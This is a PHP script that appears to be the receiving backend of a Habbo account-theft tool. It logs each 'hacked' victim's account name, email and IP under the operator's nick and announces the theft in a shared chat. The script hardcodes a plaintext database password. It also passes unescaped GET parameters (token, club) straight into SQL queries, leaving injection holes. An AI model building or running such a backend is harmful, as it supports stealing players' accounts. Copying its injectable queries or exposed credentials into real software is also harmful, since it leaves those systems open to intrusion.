Untitled

<?
	$mysql_host = "localhost";
	$mysql_user = "myhbxcoc";
	$mysql_password = "eX290sed3V";
	$mysql_database = "myhbxcoc_hbx";
	mysql_connect($mysql_host,$mysql_user,$mysql_password) or die(mysql_error());
	mysql_select_db($mysql_database);
	@date_default_timezone_set("America/Fortaleza");
@session_start();
if((time() - $_SESSION['flood'])>0) {
	unset($_SESSION['flood']);
}
$query = mysql_query("select * from `hbx_securityTokens` where token = '".$_GET['token']."'");
$query = mysql_fetch_array($query);
if(empty($query)) {
	die("<b style=color:red>XSRF Detected</b><br><br>Uma tentativa de explorar falha foi detectada [X-TOKEN INVALIDO]");
}
mysql_query("delete from `hbx_securityTokens` where token = '".$_GET['token']."'");
$hbx_id = addslashes($_GET['hid']);
isset($_SESSION['flood'])? die("Anti-Flood!") : $_SESSION['flood'] = time()+25;
$query = @mysql_query("select * from hbx_users where id='".addslashes($_GET['id'])."' and hbx_id = '$hbx_id'") or die(mysql_error());
$dados = mysql_fetch_array($query);
if($dados['nick']=="") die("Id não existe.");
$nick = $dados['nick'];
$mail = addslashes(strip_tags($_GET['email']));
$date = date("d/m/Y h:i:s");
$ip = $_SERVER['REMOTE_ADDR'];
$habbo = htmlspecialchars($_GET['h']);
if(!$habbo||$habbo == "null") die("Sem habbo.");
$n_ick = "&raquo; BotHBX";
$msg = "<font color=orange>o Habbo <b>$habbo</b> foi hackeado por <b>$nick</b>!</font>";
$suc = @mysql_query("INSERT INTO `hbx_chat` (`id`, `nick`, `message`, `del`,`hbx_id`) VALUES ('', '$n_ick', \"$msg\", '0','$hbx_id');") or die(mysql_error());


echo "S=".mysql_query("INSERT INTO `hbx_logs` (`id` ,
`owner` ,
`email` ,
`habbo`,
`date` ,
`ip`,
`hbx_id`,
`club`
)
VALUES (
NULL ,  '$nick',  '$mail', '$habbo', '$date',  '$ip','$hbx_id','".$_GET['club']."');");
?>